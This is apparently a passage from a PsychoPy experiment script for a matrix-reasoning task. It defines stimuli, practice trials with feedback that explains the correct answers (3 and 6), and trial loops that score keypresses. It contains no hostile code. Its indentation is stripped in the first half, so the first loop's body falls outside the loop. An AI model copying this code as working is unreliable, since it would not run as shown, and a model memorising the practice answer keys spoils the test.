font=u'Arial',
pos=(-20, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-8.0);
Opt3 = visual.TextStim(win=win, name='Opt3',
text=u'3',
font=u'Arial',
pos=(130, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-9.0);
Opt4 = visual.TextStim(win=win, name='Opt4',
text=u'4',
font=u'Arial',
pos=(280, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-10.0);
Opt5 = visual.TextStim(win=win, name='Opt5',
text=u'5',
font=u'Arial',
pos=(-170, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-11.0);
CFig7 = visual.ImageStim(
win=win, name='CFig7',
image='sin', mask=None,
ori=0, pos=(75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-13.0)
CFig8 = visual.ImageStim(
win=win, name='CFig8',
image='sin', mask=None,
ori=0, pos=(225, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-14.0)
Opt6 = visual.TextStim(win=win, name='Opt6',
text=u'6',
font=u'Arial',
pos=(-20, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-15.0);
Opt7 = visual.TextStim(win=win, name='Opt7',
text=u'7',
font=u'Arial',
pos=(130, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-16.0);
Opt8 = visual.TextStim(win=win, name='Opt8',
text=u'8',
font=u'Arial',
pos=(280, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-17.0);
# Initialize components for Routine "Feedback1"
Feedback1Clock = core.Clock()
Prac1Feedback = visual.TextStim(win=win, name='Prac1Feedback',
text=u'Here the correct answer is 3. \nEvery row and column has a circle, diamond and a square in it. In addition each row and column has one cell with one, two or three concentric shapes. Therefore, the missing cell needs to have three concentric shapes be a diamond shape.\n\nPress any key to continue.',
font=u'Arial',
pos=(-350, -140), height=30, wrapWidth=600, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=0.0);
Prac1Matrix = visual.ImageStim(
win=win, name='Prac1Matrix',
image='sin', mask=None,
ori=0, pos=(0, 200), size=(430, 380),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
Prac1Choice = visual.ImageStim(
win=win, name='Prac1Choice',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 200), size=1.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
CFig1 = visual.ImageStim(
win=win, name='CFig1',
image='sin', mask=None,
ori=0, pos=(-225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
CFig2 = visual.ImageStim(
win=win, name='CFig2',
image='sin', mask=None,
ori=0, pos=(-75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
CFig3 = visual.ImageStim(
win=win, name='CFig3',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-3.0)
CFig4 = visual.ImageStim(
win=win, name='CFig4',
image='sin', mask=None,
ori=0, pos=(225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-4.0)
CFig5 = visual.ImageStim(
win=win, name='CFig5',
image='sin', mask=None,
ori=0, pos=(-225, -225), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-5.0)
CFIg6 = visual.ImageStim(
win=win, name='CFIg6',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-6.0)
Opt1 = visual.TextStim(win=win, name='Opt1',
text=u'1',
font=u'Arial',
pos=(-170, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-7.0);
Opt2 = visual.TextStim(win=win, name='Opt2',
text=u'2',
font=u'Arial',
pos=(-20, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-8.0);
Opt3 = visual.TextStim(win=win, name='Opt3',
text=u'3',
font=u'Arial',
pos=(130, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-9.0);
Opt4 = visual.TextStim(win=win, name='Opt4',
text=u'4',
font=u'Arial',
pos=(280, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-10.0);
Opt5 = visual.TextStim(win=win, name='Opt5',
text=u'5',
font=u'Arial',
pos=(-170, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-11.0);
CFig7 = visual.ImageStim(
win=win, name='CFig7',
image='sin', mask=None,
ori=0, pos=(75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-13.0)
CFig8 = visual.ImageStim(
win=win, name='CFig8',
image='sin', mask=None,
ori=0, pos=(225, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-14.0)
Opt6 = visual.TextStim(win=win, name='Opt6',
text=u'6',
font=u'Arial',
pos=(-20, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-15.0);
Opt7 = visual.TextStim(win=win, name='Opt7',
text=u'7',
font=u'Arial',
pos=(130, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-16.0);
Opt8 = visual.TextStim(win=win, name='Opt8',
text=u'8',
font=u'Arial',
pos=(280, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-17.0);
# Initialize components for Routine "Feedback2"
Feedback2Clock = core.Clock()
Prac2Feedback = visual.TextStim(win=win, name='Prac2Feedback',
text=u'Here the correct answer is 6. \n\nThis is because if you subtract the elements in column 2 from column 1 you get column 3. The same is true if you subtract the elements from row 2 from the elements of row 1, you get row 3.\nPress any key to continue.',
font=u'Arial',
pos=(350, -140), height=30, wrapWidth=600, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=0.0);
Prac2Fold = visual.ImageStim(
win=win, name='Prac2Fold',
image='sin', mask=None,
ori=0, pos=(0, 200), size=(430, 380),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
Prac2Choice = visual.ImageStim(
win=win, name='Prac2Choice',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "GetReady"
GetReadyClock = core.Clock()
GetReady2 = visual.TextStim(win=win, name='GetReady2',
text='Get ready to perform the task with no feedback.\nPlease try to respond as quickly and accurately as possible.\n\nPress any key to begin.',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 200), size=1.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
CFig1 = visual.ImageStim(
win=win, name='CFig1',
image='sin', mask=None,
ori=0, pos=(-225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
CFig2 = visual.ImageStim(
win=win, name='CFig2',
image='sin', mask=None,
ori=0, pos=(-75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
CFig3 = visual.ImageStim(
win=win, name='CFig3',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-3.0)
CFig4 = visual.ImageStim(
win=win, name='CFig4',
image='sin', mask=None,
ori=0, pos=(225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-4.0)
CFig5 = visual.ImageStim(
win=win, name='CFig5',
image='sin', mask=None,
ori=0, pos=(-225, -225), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-5.0)
CFIg6 = visual.ImageStim(
win=win, name='CFIg6',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-6.0)
Opt1 = visual.TextStim(win=win, name='Opt1',
text=u'1',
font=u'Arial',
pos=(-170, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-7.0);
Opt2 = visual.TextStim(win=win, name='Opt2',
text=u'2',
font=u'Arial',
pos=(-20, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-8.0);
Opt3 = visual.TextStim(win=win, name='Opt3',
text=u'3',
font=u'Arial',
pos=(130, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-9.0);
Opt4 = visual.TextStim(win=win, name='Opt4',
text=u'4',
font=u'Arial',
pos=(280, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-10.0);
Opt5 = visual.TextStim(win=win, name='Opt5',
text=u'5',
font=u'Arial',
pos=(-170, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-11.0);
CFig7 = visual.ImageStim(
win=win, name='CFig7',
image='sin', mask=None,
ori=0, pos=(75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-13.0)
CFig8 = visual.ImageStim(
win=win, name='CFig8',
image='sin', mask=None,
ori=0, pos=(225, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-14.0)
Opt6 = visual.TextStim(win=win, name='Opt6',
text=u'6',
font=u'Arial',
pos=(-20, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-15.0);
Opt7 = visual.TextStim(win=win, name='Opt7',
text=u'7',
font=u'Arial',
pos=(130, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-16.0);
Opt8 = visual.TextStim(win=win, name='Opt8',
text=u'8',
font=u'Arial',
pos=(280, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-17.0);
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "ThankYou"
ThankYouClock = core.Clock()
text_2 = visual.TextStim(win=win, name='text_2',
text='Thank You',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# ------Prepare to start Routine "Instructions"-------
t = 0
InstructionsClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
StartPractice = event.BuilderKeyResponse()
# keep track of which components have finished
InstructionsComponents = [Instruct, StartPractice]
for thisComponent in InstructionsComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "Instructions"-------
while continueRoutine:
# get current time
t = InstructionsClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *Instruct* updates
if t >= 0.0 and Instruct.status == NOT_STARTED:
# keep track of start time/frame for later
Instruct.tStart = t
Instruct.frameNStart = frameN # exact frame index
Instruct.setAutoDraw(True)
# *StartPractice* updates
if t >= 0.0 and StartPractice.status == NOT_STARTED:
# keep track of start time/frame for later
StartPractice.tStart = t
StartPractice.frameNStart = frameN # exact frame index
StartPractice.status = STARTED
# keyboard checking is just starting
win.callOnFlip(StartPractice.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if StartPractice.status == STARTED:
theseKeys = event.getKeys()
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
StartPractice.keys = theseKeys[-1] # just the last key pressed
StartPractice.rt = StartPractice.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in InstructionsComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "Instructions"-------
for thisComponent in InstructionsComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if StartPractice.keys in ['', [], None]: # No response was made
StartPractice.keys=None
thisExp.addData('StartPractice.keys',StartPractice.keys)
if StartPractice.keys != None: # we had a response
thisExp.addData('StartPractice.rt', StartPractice.rt)
thisExp.nextEntry()
# the Routine "Instructions" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
trials = data.TrialHandler(nReps=1, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('Matrices.csv', selection='[0]'),
seed=None, name='trials')
thisExp.addLoop(trials) # add the loop to the experiment
thisTrial = trials.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial.keys():
exec(paramName + '= thisTrial.' + paramName)
for thisTrial in trials:
currentLoop = trials
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial.keys():
exec(paramName + '= thisTrial.' + paramName)
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
image.setImage(Stimulus)
image.setSize((430,380))
CFig1.setImage(Choice1)
CFig2.setImage(Choice2)
CFig3.setImage(Choice3)
CFig4.setImage(Choice4)
CFIg6.setImage(Choice6)
# --- finish preparing Routine "trial" ---
key_resp_2 = event.BuilderKeyResponse()
CFig7.setImage(Choice7)
CFig8.setImage(Choice8)
# keep track of which components have finished
trialComponents = [image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6, Opt1, Opt2, Opt3, Opt4, Opt5, key_resp_2, CFig7, CFig8, Opt6, Opt7, Opt8]
for thisComponent in trialComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
    # get current time
    t = trialClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # start every pre-response visual stimulus that has not begun yet;
    # the tuple order matches the original per-component code, preserving
    # the setAutoDraw call order (and hence draw order)
    for visComp in (image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6,
                    Opt1, Opt2, Opt3, Opt4, Opt5):
        if t >= 0.0 and visComp.status == NOT_STARTED:
            visComp.tStart = t
            visComp.frameNStart = frameN  # exact frame index
            visComp.setAutoDraw(True)
    if CFig5.status == STARTED:  # only update if drawing
        CFig5.setImage(Choice5, log=False)
    # *key_resp_2* updates
    if t >= 0.0 and key_resp_2.status == NOT_STARTED:
        key_resp_2.tStart = t
        key_resp_2.frameNStart = frameN  # exact frame index
        key_resp_2.status = STARTED
        # keyboard checking is just starting
        win.callOnFlip(key_resp_2.clock.reset)  # t=0 on next screen flip
        event.clearEvents(eventType='keyboard')
    if key_resp_2.status == STARTED:
        theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])
        # check for quit:
        if "escape" in theseKeys:
            endExpNow = True
        if len(theseKeys) > 0:  # at least one key was pressed
            key_resp_2.keys = theseKeys[-1]  # just the last key pressed
            key_resp_2.rt = key_resp_2.clock.getTime()
            # score against Corr (compared both as string and raw value)
            if (key_resp_2.keys == str(Corr)) or (key_resp_2.keys == Corr):
                key_resp_2.corr = 1
            else:
                key_resp_2.corr = 0
            # a response ends the routine
            continueRoutine = False
    # start the remaining visual stimuli (originally listed after key_resp_2)
    for visComp in (CFig7, CFig8, Opt6, Opt7, Opt8):
        if t >= 0.0 and visComp.status == NOT_STARTED:
            visComp.tStart = t
            visComp.frameNStart = frameN  # exact frame index
            visComp.setAutoDraw(True)
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in trialComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# check responses
if key_resp_2.keys in ['', [], None]:  # no response was made
    key_resp_2.keys = None
    # was no response the correct answer?!
    if str(Corr).lower() == 'none':
        key_resp_2.corr = 1  # correct non-response
    else:
        key_resp_2.corr = 0  # failed to respond (incorrectly)
# store data for trials (TrialHandler)
trials.addData('key_resp_2.keys', key_resp_2.keys)
trials.addData('key_resp_2.corr', key_resp_2.corr)
if key_resp_2.keys is not None:  # we had a response
    trials.addData('key_resp_2.rt', key_resp_2.rt)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "Feedback1"-------
t = 0
Feedback1Clock.reset()  # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
Prac1Matrix.setImage(Stimulus)
Prac1Choice.setImage(Choice3)
Prac1End = event.BuilderKeyResponse()
# keep track of which components have finished
Feedback1Components = [Prac1Feedback, Prac1Matrix, Prac1Choice, Prac1End]
for thisComponent in Feedback1Components:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# -------Start Routine "Feedback1"-------
while continueRoutine:
    # get current time
    t = Feedback1Clock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # start all visual components not yet begun (order preserves draw order)
    for visComp in (Prac1Feedback, Prac1Matrix, Prac1Choice):
        if t >= 0.0 and visComp.status == NOT_STARTED:
            visComp.tStart = t
            visComp.frameNStart = frameN  # exact frame index
            visComp.setAutoDraw(True)
    # *Prac1End* keyboard component: any key ends the routine
    if t >= 0.0 and Prac1End.status == NOT_STARTED:
        Prac1End.tStart = t
        Prac1End.frameNStart = frameN  # exact frame index
        Prac1End.status = STARTED
        # keyboard checking is just starting
        win.callOnFlip(Prac1End.clock.reset)  # t=0 on next screen flip
        event.clearEvents(eventType='keyboard')
    if Prac1End.status == STARTED:
        theseKeys = event.getKeys()
        # check for quit:
        if "escape" in theseKeys:
            endExpNow = True
        if len(theseKeys) > 0:  # at least one key was pressed
            Prac1End.keys = theseKeys[-1]  # just the last key pressed
            Prac1End.rt = Prac1End.clock.getTime()
            # a response ends the routine
            continueRoutine = False
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in Feedback1Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "Feedback1"-------
for thisComponent in Feedback1Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# check responses
if Prac1End.keys in ['', [], None]:  # no response was made
    Prac1End.keys = None
trials.addData('Prac1End.keys', Prac1End.keys)
if Prac1End.keys is not None:  # we had a response
    trials.addData('Prac1End.rt', Prac1End.rt)
# the Routine "Feedback1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset()  # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)  # fixed-duration routine: 0.5 s
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
    # get current time
    t = crosshairClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # *text* updates — starts immediately
    if t >= 0.0 and text.status == NOT_STARTED:
        text.tStart = t
        text.frameNStart = frameN  # exact frame index
        text.setAutoDraw(True)
    # stop just under one frame before the nominal 0.5 s offset
    frameRemains = 0.0 + 0.5 - win.monitorFramePeriod * 0.75  # most of one frame period left
    if text.status == STARTED and t >= frameRemains:
        text.setAutoDraw(False)
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in crosshairComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.nextEntry()
# completed 1 repeats of 'trials'
# set up handler to look after randomisation of conditions etc
# (sequential, single repeat, only row [1] of the conditions file)
trials_3 = data.TrialHandler(nReps=1, method='sequential',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('Matrices.csv', selection='[1]'),
    seed=None, name='trials_3')
thisExp.addLoop(trials_3)  # add the loop to the experiment
thisTrial_3 = trials_3.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial_3.rgb)
if thisTrial_3 is not None:  # identity test with None, not != (PEP 8 E711)
    for paramName in thisTrial_3.keys():
        # NOTE(review): exec over condition-file column names is PsychoPy
        # Builder boilerplate; safe only while 'Matrices.csv' is trusted.
        exec(paramName + '= thisTrial_3.' + paramName)
# run the trials_3 loop: each iteration is one "trial" routine followed by
# the "Feedback2" routine and a 0.5 s "crosshair" fixation
for thisTrial_3 in trials_3:
    currentLoop = trials_3
    # abbreviate parameter names if possible (e.g. rgb = thisTrial_3.rgb)
    if thisTrial_3 is not None:
        for paramName in thisTrial_3.keys():
            exec(paramName + '= thisTrial_3.' + paramName)
    # ------Prepare to start Routine "trial"-------
    t = 0
    trialClock.reset()  # clock
    frameN = -1
    continueRoutine = True
    # update component parameters for each repeat
    image.setImage(Stimulus)
    image.setSize((430, 380))
    CFig1.setImage(Choice1)
    CFig2.setImage(Choice2)
    CFig3.setImage(Choice3)
    CFig4.setImage(Choice4)
    CFIg6.setImage(Choice6)
    key_resp_2 = event.BuilderKeyResponse()
    CFig7.setImage(Choice7)
    CFig8.setImage(Choice8)
    # keep track of which components have finished
    trialComponents = [image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6, Opt1, Opt2, Opt3, Opt4, Opt5, key_resp_2, CFig7, CFig8, Opt6, Opt7, Opt8]
    for thisComponent in trialComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # -------Start Routine "trial"-------
    while continueRoutine:
        t = trialClock.getTime()
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # start pre-response visual stimuli (tuple order preserves the
        # original setAutoDraw call order, and hence draw order)
        for visComp in (image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6,
                        Opt1, Opt2, Opt3, Opt4, Opt5):
            if t >= 0.0 and visComp.status == NOT_STARTED:
                visComp.tStart = t
                visComp.frameNStart = frameN  # exact frame index
                visComp.setAutoDraw(True)
        if CFig5.status == STARTED:  # only update if drawing
            CFig5.setImage(Choice5, log=False)
        # *key_resp_2* updates
        if t >= 0.0 and key_resp_2.status == NOT_STARTED:
            key_resp_2.tStart = t
            key_resp_2.frameNStart = frameN  # exact frame index
            key_resp_2.status = STARTED
            # keyboard checking is just starting
            win.callOnFlip(key_resp_2.clock.reset)  # t=0 on next screen flip
            event.clearEvents(eventType='keyboard')
        if key_resp_2.status == STARTED:
            theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])
            # check for quit:
            if "escape" in theseKeys:
                endExpNow = True
            if len(theseKeys) > 0:  # at least one key was pressed
                key_resp_2.keys = theseKeys[-1]  # just the last key pressed
                key_resp_2.rt = key_resp_2.clock.getTime()
                # score against Corr (compared both as string and raw value)
                if (key_resp_2.keys == str(Corr)) or (key_resp_2.keys == Corr):
                    key_resp_2.corr = 1
                else:
                    key_resp_2.corr = 0
                # a response ends the routine
                continueRoutine = False
        # start the remaining visual stimuli (originally after key_resp_2)
        for visComp in (CFig7, CFig8, Opt6, Opt7, Opt8):
            if t >= 0.0 and visComp.status == NOT_STARTED:
                visComp.tStart = t
                visComp.frameNStart = frameN  # exact frame index
                visComp.setAutoDraw(True)
        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in trialComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "trial"-------
    for thisComponent in trialComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    # check responses
    if key_resp_2.keys in ['', [], None]:  # no response was made
        key_resp_2.keys = None
        # was no response the correct answer?!
        if str(Corr).lower() == 'none':
            key_resp_2.corr = 1  # correct non-response
        else:
            key_resp_2.corr = 0  # failed to respond (incorrectly)
    # store data for trials_3 (TrialHandler)
    trials_3.addData('key_resp_2.keys', key_resp_2.keys)
    trials_3.addData('key_resp_2.corr', key_resp_2.corr)
    if key_resp_2.keys is not None:  # we had a response
        trials_3.addData('key_resp_2.rt', key_resp_2.rt)
    # the Routine "trial" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()
    # ------Prepare to start Routine "Feedback2"-------
    t = 0
    Feedback2Clock.reset()  # clock
    frameN = -1
    continueRoutine = True
    # update component parameters for each repeat
    Prac2Fold.setImage(Stimulus)
    Prac2Choice.setImage(Choice6)
    Prac2End = event.BuilderKeyResponse()
    # keep track of which components have finished
    Feedback2Components = [Prac2Feedback, Prac2Fold, Prac2Choice, Prac2End]
    for thisComponent in Feedback2Components:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # -------Start Routine "Feedback2"-------
    while continueRoutine:
        t = Feedback2Clock.getTime()
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # start all visual components not yet begun (order preserves draw order)
        for visComp in (Prac2Feedback, Prac2Fold, Prac2Choice):
            if t >= 0.0 and visComp.status == NOT_STARTED:
                visComp.tStart = t
                visComp.frameNStart = frameN  # exact frame index
